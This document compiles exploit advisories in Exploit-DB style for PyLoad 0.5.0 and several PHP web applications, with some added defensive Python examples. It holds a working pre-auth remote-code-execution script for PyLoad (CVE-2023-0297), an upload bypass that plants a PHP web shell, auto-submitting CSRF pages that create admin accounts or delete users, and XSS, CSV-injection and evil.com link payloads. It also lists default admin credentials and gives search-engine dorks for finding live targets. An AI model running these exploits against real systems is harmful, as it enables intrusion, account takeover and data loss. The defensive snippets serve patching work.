<pre><code>====================================================================================================================================<br />| # Title : phpFK v8.0 version XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) | <br />| # Vendor : https://www.frank-karau.de/demo-forum/ | <br />| # Dork : Powered by: phpFK |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}}<br /><br />[+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}}<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)<br /># Date: 06-10-2023<br /># Credits: bAu @bauh0lz<br /># Exploit Author: Gabriel Lima (0xGabe)<br /># Vendor Homepage: https://pyload.net/<br /># Software Link: https://github.com/pyload/pyload<br /># Version: 0.5.0<br /># Tested on: Ubuntu 20.04.6<br /># CVE: CVE-2023-0297<br /><br />import argparse<br />import sys<br /><br />import requests<br /><br />parser = argparse.ArgumentParser()<br />parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')<br />parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')<br />arguments = parser.parse_args()<br /><br /><br />def doRequest(url):<br />    # Reachability check: a 200 from the base URL counts as "host up".<br />    try:<br />        res = requests.get(url)<br />        return res.status_code == 200<br />    except requests.exceptions.RequestException as e:<br />        print("[!] Maybe the host is offline :", e)<br />        sys.exit(1)<br /><br /><br />def runExploit(url, cmd):<br />    endpoint = url + '/flash/addcrypted2'<br />    # The body is sent as a raw form string, so spaces must be percent-encoded.<br />    validCommand = cmd.replace(" ", "%20")<br /><br />    payload = 'jk=pyimport%20os;os.system("' + validCommand + '");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'<br />    requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'}, data=payload)<br />    print('[+] The exploit has been executed on the target machine.')<br /><br /><br />def main(targetUrl, Command):<br />    print('[+] Check if target host is alive: ' + targetUrl)<br />    if doRequest(targetUrl):<br />        print("[+] Host up, let's exploit!")<br />        runExploit(targetUrl, Command)<br />    else:<br />        print('[-] Host down!')<br /><br /><br />if arguments.url is not None and arguments.cmd is not None:<br />    main(arguments.url, arguments.cmd)<br /></code></pre>
<pre><code>Exploit Title: projectSend r1605 - CSV injection<br />Version: r1605<br />Bugs: CSV Injection<br />Technology: PHP<br />Vendor URL: https://www.projectsend.org/<br />Software Link: https://www.projectsend.org/<br />Date found: 11-06-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Windows<br /><br /><br />2. Technical Details & POC<br />========================================<br />Step 1. Log in as a user.<br />Step 2. Go to My Account ( http://localhost/users-edit.php?id=2 ).<br />Step 3. Set the name to =calc|a!z|<br />Step 4. When the admin exports the action log as a CSV file ( http://localhost/actions-log.php ), the CSV injection fires on the admin's computer and opens the calculator.<br /><br />payload: =calc|a!z|<br /><br /></code></pre>
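The fix on the exporting side, as an added example that is not projectSend's code: cells that begin with a formula trigger (such as the `=calc|a!z|` name above) are prefixed with an apostrophe before they reach the CSV, and the export is re-parsed to confirm nothing evaluable remains. Python is used here rather than the application's PHP; the log rows are constructed.

```python
"""Neutralise spreadsheet formula injection in a CSV export.

Added example, not projectSend code. A cell that begins with =, +, -, @,
tab or CR is evaluated when the CSV is opened in Excel or LibreOffice;
"=calc|a!z|" is a DDE-style command. Prefixing such cells with an
apostrophe makes the spreadsheet treat them as text.
"""
import csv
import io

# Leading characters that make a spreadsheet evaluate the cell.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample of an action log; the second row's user field is the
# payload from the advisory.
SAMPLE_LOG = [
    {"time": "2023-06-11 10:00:00", "action": "Logged in", "user": "admin"},
    {"time": "2023-06-11 10:02:15", "action": "Edited profile", "user": "=calc|a!z|"},
]
FIELDNAMES = ["time", "action", "user"]


def is_formula_like(cell: str) -> bool:
    """True if a spreadsheet would interpret this cell as a formula."""
    return cell.startswith(FORMULA_TRIGGERS)


def neutralise_cell(value):
    """Defang one cell: formula-like strings get a leading apostrophe.

    Non-string values (ints, None) are returned unchanged. A string such as
    "-5" is also defanged, so export numbers as numbers, not as strings.
    """
    if isinstance(value, str) and is_formula_like(value):
        return "'" + value
    return value


def export_rows(rows, fieldnames, neutralise=True) -> str:
    """Write rows to CSV text. QUOTE_ALL keeps embedded commas, quotes and
    newlines inside one cell so they cannot start a new, unprotected cell."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        if neutralise:
            row = {k: neutralise_cell(v) for k, v in row.items()}
        writer.writerow(row)
    return buf.getvalue()


def export_is_safe(csv_text: str) -> bool:
    """Re-parse an export and confirm no cell would be evaluated as a formula."""
    reader = csv.reader(io.StringIO(csv_text))
    return all(not is_formula_like(cell) for row in reader for cell in row)


if __name__ == "__main__":
    print(export_rows(SAMPLE_LOG, FIELDNAMES))
```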
<pre><code>Exploit Title: projectSend r1605 - Stored XSS<br />Application: projectSend<br />Version: r1605<br />Bugs: Stored XSS<br />Technology: PHP<br />Vendor URL: https://www.projectsend.org/<br />Software Link: https://www.projectsend.org/<br />Date found: 11-06-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux<br /><br />2. Technical Details & POC<br />========================================<br /><br />1. Log in as admin<br />2. Go to Custom HTML/CSS/JS (http://localhost/custom-assets.php)<br />3. Go to New JS (http://localhost/custom-assets-add.php?language=js)<br />4. Set the content to alert("xss"); and set it to public<br />5. Save<br />6. Log out and go to http://localhost<br /><br />payload: alert("xss")<br /><br />POST /custom-assets-add.php HTTP/1.1<br />Host: localhost<br />Content-Length: 171<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/custom-assets-add.php?language=js<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: log_download_started=false; PHPSESSID=7j8g8u9t7khb259ci4fvareg2l<br />Connection: close<br /><br />csrf_token=222b49c5c4a1755c451637f17ef3e7ea8bb5b6ee616293bd73d15d0e608d9dab&language=js&title=test&content=alert%28%22XSS%22%29%3B&enabled=on&location=public&position=head<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Rest-Cafe and Restaurant Website CMS 2.0.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 67.0.2(64-bit) | <br />| # Vendor : https://codecanyon.net/item/rest-cafe-and-restaurant-website-cms/21630154 | <br />| # Dork : "news.php?slug=" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The application leaves a default set of administrative credentials in place after installation.<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Log in with the default credentials:<br /><br />Super Admin<br /><br />Username: sadmin@gmail.com<br /><br />Password: 1234<br /><br />Admin<br /><br />Username: admin@gmail.com<br /><br />Password: 1234<br /><br />[+] https://127.0.0.1/nominomidelight.com/admin/visual_settings<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : QUICKAD CMS 7.3 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | <br />| # Vendor : https://codecanyon.net/item/quickad-classified-ads-php-script/19960675?s_rank=189 | <br />| # Dork : "Bylancer, All right reserved" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] The following HTML code creates a new admin user.<br /><br />[+] Go to line 61.<br /><br />[+] Set the target site link, save the changes and apply.<br /><br />[+] Affected file : /admin/panel/admin_add.php<br /><br />[+] http://127.0.0.1/q7.3/admin/panel/admin_add.php<br /><br />[+] Save the code as poc.html .<br /><br /><!DOCTYPE html><br /><html xmlns="http://www.w3.org/1999/xhtml"><br /><head profile="http://www.w3.org/2005/10/profile"><br /><br /> <!-- Google fonts --><br /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Roboto:300,400,400italic,500,900%7CRoboto+Slab:300,400%7CRoboto+Mono:400" /><br /><br /> <!-- Page JS Plugins CSS --><br /> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slick/slick.min.css" /><br /> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slick/slick-theme.min.css" /><br /> <!-- css select2 --><br /> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/select2/select2.min.css" /><br /> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/select2/select2-bootstrap.css" /><br /> <!-- Zeunix CSS stylesheets --><br /> <link rel="stylesheet" 
id="css-font-awesome" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/font-awesome.css" /><br /> <link rel="stylesheet" id="css-ionicons" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/ionicons.css" /><br /> <link rel="stylesheet" id="css-bootstrap" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/bootstrap.css" /><br /> <link rel="stylesheet" id="css-app" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/app.css" /><br /> <link rel="stylesheet" id="css-app-custom" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/app-custom.css" /><br /> <link rel="stylesheet" id="css-app-animation" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/animation.css" /><br /> <!-- End Stylesheets --><br /> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/category.css" /><br /><br /> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/asscrollable/asScrollable.min.css"><br /> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slidepanel/slidePanel.min.css"><br /> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/datatables/jquery.dataTables.min.css" /><br /><br /><br /> <!--alerts CSS --><br /> <link href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/sweetalert/sweetalert.css" rel="stylesheet" type="text/css"><br /> <link href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/alertify/alertify.min.css" rel="stylesheet" type="text/css"><br /><br /> <script><br /> var sidepanel_ajaxurl = 'https://127.0.0.1/classified.bylancer.com/admin/ajax_sidepanel.php';<br /> </script><br /></head><br /><br /><body class="app-ui layout-has-drawer layout-has-fixed-header"><br /><br /><div class="app-layout-canvas"><br /> <div class="app-layout-container"><br /><br /><br /> <aside 
class="app-layout-drawer"><br /><br /> <!-- Drawer scroll area --><br /> <div class="app-layout-drawer-scroll"><br /> <!-- Drawer logo --><br /> <div id="logo" class="drawer-header"><br /> <br /> <br /><main class="app-layout-content"><br /><br /> <!-- Page Content --><br /> <div class="container-fluid p-y-md"><br /> <!-- Partial Table --><br /> <div class="card"><br /> <div class="card-header"><br /> <h4>Admin users</h4><br /> <div class="pull-right"><br /> <a href="#" data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" class="btn btn-success waves-effect waves-light m-r-10">Add Admin User</a><br /> </div><br /> </div><br /> <div class="card-block"><br /> <div id="js-table-list"><br /> <table id="ajax_datatable" data-jsonfile="https://127.0.0.1/classified.bylancer.com/admin/admins.php" class="js-table-checkable table table-vcenter table-hover" data-tablesaw-mode="stack" data-plugin="animateList" data-animate="fade" data-child="tr" data-selectable="selectable"><br /> <thead><br /> <tr><br /> <th class="text-center w-5 sortingNone"><br /> <label class="css-input css-checkbox css-checkbox-default m-t-0 m-b-0"><br /> <input type="checkbox" id="check-all" name="check-all"><span></span><br /> </label><br /> </th><br /> <th><i class="ion-image"></i> Admin user</th><br /> <th class="w-10">Email</th><br /> <th style="width: 60px;">Actions</th><br /> </tr><br /> </thead><br /> <tbody id="ajax-services"><br /><br /> </tbody><br /> </table><br /><br /> </div><br /><br /><br /> </div><br /> <!-- .card-block --><br /> </div><br /> <!-- .card --><br /> <!-- End Partial Table --><br /><br /> </div><br /> <!-- .container-fluid --><br /> <!-- End Page Content --><br /><br /></main><br /><script data-ad-client="ca-pub-9756159400559709" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><br /><div class="site-action"><br /> <button 
data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" id="slidepanel-show" style="display: none;"> </button><br /> <button type="button" class="site-action-toggle btn-raised btn btn-success btn-floating"><br /> <i class="front-icon ion-android-add animation-scale-up" aria-hidden="true"></i><br /> <i class="back-icon ion-android-close animation-scale-up" aria-hidden="true"></i><br /> </button><br /> <div class="site-action-buttons"><br /> <button type="button" data-ajax-response="deletemarked" data-ajax-action="deleteadmin"<br /> class="btn-raised btn btn-danger btn-floating animation-slide-bottom"><br /> <i class="icon ion-android-delete" aria-hidden="true"></i><br /> </button><br /> </div><br /></div><br /><br /> <div class="col-md-12"><br /> <!-- Site Action --><br /><div class="site-action"><br /> <button data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" id="slidepanel-show" style="display: none;"> </button><br /> <button type="button" class="site-action-toggle btn-raised btn btn-success btn-floating"><br /> <i class="front-icon ion-android-add animation-scale-up" aria-hidden="true"></i><br /> <i class="back-icon ion-android-close animation-scale-up" aria-hidden="true"></i><br /> </button><br /> <div class="site-action-buttons"><br /> <button type="button" data-ajax-response="deletemarked" data-ajax-action="deleteadmin"<br /> class="btn-raised btn btn-danger btn-floating animation-slide-bottom"><br /> <i class="icon ion-android-delete" aria-hidden="true"></i><br /> </button><br /> </div><br /></div><br /><br /> <div class="form-group"><br /> <label for="exampleInputfullname">Full Name<code></code></label><br /> <div class="input-group"><br /> <div class="input-group-addon"><i class="ion-person"></i></div><br /> <input type="text" class="form-control" id="exampleInputfullname" placeholder="Full Name" name="name" required=""><br /> <span 
class="help-block"></span><br /> </div><br /> </div><br /> </div><br /><br /> <h4 class="box-title">User Login Details</h4><br /> <hr><br /> <div class="col-md-12"><br /> <div class="form-group"><br /> <label for="exampleInputuname">Username<code>*</code></label><br /> <div class="input-group"><br /> <div class="input-group-addon"><i class="ion-person"></i></div><br /> <input type="text" class="form-control" id="exampleInputuname" placeholder="Username" name="username" required=""><br /> </div><br /> </div><br /> </div><br /><br /> <div class="col-md-12"><br /> <div class="form-group"><br /> <label for="exampleInputEmail1">Email address<code></code></label><br /> <div class="input-group"><br /> <div class="input-group-addon"><i class="ion-android-mail"></i></div><br /> <input type="email" class="form-control" id="exampleInputEmail1" placeholder="Email" name="email" required=""><br /> </div><br /> </div><br /> </div><br /> <div class="col-md-12"><br /> <div class="form-group"><br /> <label for="exampleInputpwd1">Password<code></code></label><br /> <div class="input-group"><br /> <div class="input-group-addon"><i class="ion-android-lock"></i></div><br /> <input type="password" class="form-control" id="exampleInputpwd1" placeholder="Login Password" name="password" required=""><br /> </div><br /> </div><br /> </div><br /> </div><br /><br /> <div class="row"><br /><br /> </div><br /><br /> <br /><br /> </div><br /><br /> </form><br /> </div><br /> </div><br /> </div><br /> <!-- /.row --><br /> </div><br /></div><br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: Online Examination System Project 1.0 - Cross-site request forgery (CSRF)<br /># Google Dork: n/a<br /># Date: 09/06/2023<br /># Exploit Author: Ramil Mustafayev (kryptohaker)<br /># Vendor Homepage: https://github.com/projectworldsofficial/online-examination-systen-in-php<br /># Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip<br /># Version: 1.0<br /># Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28<br /># CVE : n/a<br /><br />Online Examination System Project versions <=1.0 (PHP/MySQL) are vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious link that, when clicked by an admin user, will delete a user account from the database without the admin's consent. This is possible because the application uses GET requests to perform account deletion and does not implement any CSRF protection mechanism. The email of the user to be deleted is passed as a parameter in the URL, which can be manipulated by the attacker. This could result in loss of data.<br /><br />To exploit this vulnerability, an attacker needs to do the following:<br /><br />1. Identify the URL of the target application where Online Examination System Project is installed. For example, http://example.com/<br />2. Identify the email address of a user account that the attacker wants to delete. For example, victim@example.com<br />3. Create an HTML page that contains a hidden form with the target URL and the user email as parameters. For example:<br /><br /><html><br />  <body><br />    <form action="http://example.com/update.php" method="GET"><br />      <input type="hidden" name="demail" value="victim@example.com" /><br />    </form><br />    <script><br />      document.forms[0].submit();<br />    </script><br />  </body><br /></html><br /><br />4. Host the HTML page on a server that is accessible by the admin user of the target application. For example, http://attacker.com/poc.html<br />5. Send the URL of the HTML page to the admin user via email, social media, or any other means.<br /><br />If the admin user visits the URL of the HTML page, the script will submit the form and delete the user account associated with the email address from the database without the admin's consent or knowledge.<br /><br /><br /></code></pre>
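What makes the forged GET above succeed, and a handler that refuses it, as an added example that is not the Online Examination System's code. `Request`, `vulnerable_delete`, `hardened_delete` and `issue_csrf_token` are hypothetical names; `update.php`, the `demail` parameter and the example.com/attacker.com hosts come from the advisory. Python stands in for the application's PHP; the request objects are constructed.

```python
"""Deleting by GET without a token versus a CSRF-resistant handler.

Added example, not the Online Examination System's code. The vulnerable
update.php deletes the account named by ?demail= on a plain GET with no
token, so any page the admin visits can trigger it. The hardened handler
requires POST, a per-session CSRF token compared in constant time, and a
same-origin Sec-Fetch-Site/Origin whenever the browser supplies one.
"""
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    """Minimal stand-in for a framework request object (constructed)."""
    method: str
    query: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)


def issue_csrf_token(session: dict) -> str:
    """Create (or reuse) the session's CSRF token for the admin's delete form."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def vulnerable_delete(req: Request, users: set) -> int:
    """Pattern from the advisory: GET parameter, no token, no origin check."""
    email = req.query.get("demail")
    if email in users:
        users.remove(email)
        return 200
    return 404


def hardened_delete(req: Request, session: dict, users: set, site_origin: str) -> int:
    """Reject everything a cross-site page could produce before touching state."""
    if req.method != "POST":
        return 405  # a GET must never change state; it is trivially forgeable
    # Modern browsers send Sec-Fetch-Site; a cross-site form post is flagged.
    if req.headers.get("Sec-Fetch-Site", "same-origin") not in ("same-origin", "none"):
        return 403
    origin = req.headers.get("Origin")
    if origin is not None and origin != site_origin:
        return 403
    expected = session.get("csrf_token", "")
    supplied = req.form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403
    email = req.form.get("demail")
    if email in users:
        users.remove(email)
        return 200
    return 404
```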
<pre><code>Exploit Title: Teachers Record Management System 1.0 – File Upload Type Validation<br />Date: 17-01-2023<br />EXPLOIT-AUTHOR: AFFAN AHMED<br />Vendor Homepage: <https://phpgurukul.com><br />Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/><br />Version: 1.0<br />Tested on: Windows 11 + XAMPP<br />CVE : CVE-2023-3187<br /><br />===============================<br />STEPS_TO_REPRODUCE<br />===============================<br />1. Log in to the teacher account with the credentials “Username: jogoe12@yourdomain.com / Password: Test@123”<br />2. Navigate to the Profile section and edit the profile picture by clicking on Edit Image<br />3. Open Burp Suite and intercept the Edit Image request<br />4. In the POST request, change the “Filename” from “profile picture.png” to “profile picture.php.gif”<br />5. Change the **Content-Type** from “image/png” to “image/gif”<br />6. Add this **payload**: `GIF89a <?php echo system($_REQUEST['dx']); ?>`<br />7. **GIF89a is the GIF magic-byte signature; this bypasses the file upload extension check**<br />8. Below is the Burp Suite POST request for all the changes that I have made above<br /><br />==========================================<br />BURPSUITE_REQUEST<br />==========================================<br />POST /trms/teacher/changeimage.php HTTP/1.1<br />Host: localhost<br />Content-Length: 442<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: <http://localhost><br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: <http://localhost/trms/teacher/changeimage.php><br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc<br />Connection: close<br /><br />------WebKitFormBoundaryndAPYa0GGOxSUHdF<br />Content-Disposition: form-data; name="subjects"<br /><br />John Doe<br />------WebKitFormBoundaryndAPYa0GGOxSUHdF<br />Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"<br />Content-Type: image/gif<br /><br />GIF89a <?php echo system($_REQUEST['dx']); ?><br /><br />------WebKitFormBoundaryndAPYa0GGOxSUHdF<br />Content-Disposition: form-data; name="submit"<br /><br /><br />------WebKitFormBoundaryndAPYa0GGOxSUHdF--<br /><br /><br />===============================<br />PROOF_OF_CONCEPT<br />===============================<br />GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md<br /><br /></code></pre>
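The validation that the renamed file and GIF89a prefix above get past, beside a version that does not trust either, as an added example that is not the vendor's code. `naive_accepts`, `sniff_type` and `validate_upload` are hypothetical names; the filename and payload bytes are those from the advisory, the PNG stub is constructed, and Python stands in for the application's PHP.

```python
"""Image upload validation: the check the advisory bypasses, and a stricter one.

Added example, not PHPGurukul's code. The advisory renames "profile picture.png"
to "profile picture.php.gif", declares Content-Type image/gif and prepends the
GIF89a signature. A check that trusts the declared type or looks only at the
last extension accepts that; the validator below does not.
"""
import secrets

# Allowed image types and their magic-byte signatures (extend as needed).
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Constructed inputs: the advisory's payload and a minimal PNG stub.
PAYLOAD = b"GIF89a <?php echo system($_REQUEST['dx']); ?>"
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


def naive_accepts(filename: str, declared_type: str) -> bool:
    """Weak pattern: trust the client's Content-Type and the final extension only."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return declared_type.startswith("image/") and ext in ALLOWED


def sniff_type(data: bytes):
    """Image type implied by the magic bytes, or None if not an allowed image."""
    for ext, magics in ALLOWED.items():
        if data.startswith(magics):
            return ext
    return None


def validate_upload(filename: str, data: bytes, token=None):
    """Return (True, stored_name) or (False, reason).

    The declared Content-Type is deliberately not a parameter: it is
    client-controlled and carries no trust. The stored name is generated
    server-side so the original name never reaches the filesystem.
    """
    segments = filename.lower().split(".")
    if len(segments) < 2 or not segments[0].strip():
        return False, "missing extension"
    exts = segments[1:]
    # Every dotted segment after the stem must itself be an allowed extension,
    # so "profile picture.php.gif" (exts == ["php", "gif"]) is rejected on "php".
    for ext in exts:
        if ext not in ALLOWED:
            return False, f"disallowed extension segment: {ext}"
    sniffed = sniff_type(data)
    if sniffed != exts[-1]:
        return False, f"content ({sniffed}) does not match extension ({exts[-1]})"
    # Defence in depth: a valid image header followed by PHP tags is still a
    # polyglot; serve uploads from a non-executing location regardless.
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded PHP tag"
    token = token or secrets.token_hex(8)
    return True, f"{token}.{sniffed}"
```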
<pre><code>Exploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities<br />Google Dork: NA<br />Date: 09-06-2023<br />EXPLOIT-AUTHOR: AFFAN AHMED<br />Vendor Homepage: <https://www.sourcecodester.com/><br />Software Link: <https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code><br />Version: 1.0<br />Tested on: Windows 11 + XAMPP<br />CVE : CVE-2023-3184<br /><br />==============================<br />CREDENTIAL TO USE<br />==============================<br />ADMIN-ACCOUNT<br />USERNAME: admin<br />PASSWORD: admin123<br /><br />=============================<br />PAYLOAD_USED<br />=============================<br />1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a><br />2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a><br />3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a><br />4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a><br /><br /><br />===============================<br />STEPS_TO_REPRODUCE<br />===============================<br />1. FIRST LOG IN TO YOUR ACCOUNT USING THE GIVEN ADMIN CREDENTIALS<br />2. THEN NAVIGATE TO USER_LIST AND CLICK ON THE `CREATE NEW` BUTTON, OR VISIT THIS URL: `http://localhost/php-sts/admin/?page=user/manage_user`<br />3. THEN FILL IN THE DETAILS AND PUT THE ABOVE PAYLOAD IN `firstname`, `middlename`, `lastname` AND `username`<br />4. AFTER ENTERING THE PAYLOAD, CLICK ON THE SAVE BUTTON<br />5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO THE ADMIN SITE, WHERE YOU CAN SEE THAT THE NEW USER HAS BEEN ADDED<br />6. AFTER CLICKING ON EACH PAYLOAD, IT REDIRECTED ME TO THE EVIL SITE<br /><br /><br /><br />==========================================<br />BURPSUITE_REQUEST<br />==========================================<br />POST /php-sts/classes/Users.php?f=save HTTP/1.1<br />Host: localhost<br />Content-Length: 1037<br />sec-ch-ua: <br />Accept: */*<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36<br />sec-ch-ua-platform: ""<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/php-sts/admin/?page=user/manage_user<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn<br />Connection: close<br /><br />------WebKitFormBoundary7hwjNQW3mptDFOwo<br />Content-Disposition: form-data; name="id"<br /><br /><br />------WebKitFormBoundary7hwjNQW3mptDFOwo<br />Content-Disposition: form-data; name="firstname"<br /><br /><a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a><br />------WebKitFormBoundary7hwjNQW3mptDFOwo<br />Content-Disposition: form-data; name="middlename"<br /><br /><a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a><br />------WebKitFormBoundary7hwjNQW3mptDFOwo<br />Content-Disposition: form-data; name="lastname"<br /><br /><a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a><br />------WebKitFormBoundary7hwjNQW3mptDFOwo<br />Content-Disposition: form-data; name="username"<br /><br /><a href=//evil.com>CLICK_HERE_FOR_USERNAME</a><br />------WebKitFormBoundary7hwjNQW3mptDFOwo<br />Content-Disposition: form-data; name="password"<br /><br />1234<br />------WebKitFormBoundary7hwjNQW3mptDFOwo<br />Content-Disposition: form-data; name="type"<br /><br />2<br />------WebKitFormBoundary7hwjNQW3mptDFOwo<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundary7hwjNQW3mptDFOwo--<br /><br />===============================<br />PROOF_OF_CONCEPT<br />===============================<br />GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md<br /><br /></code></pre>
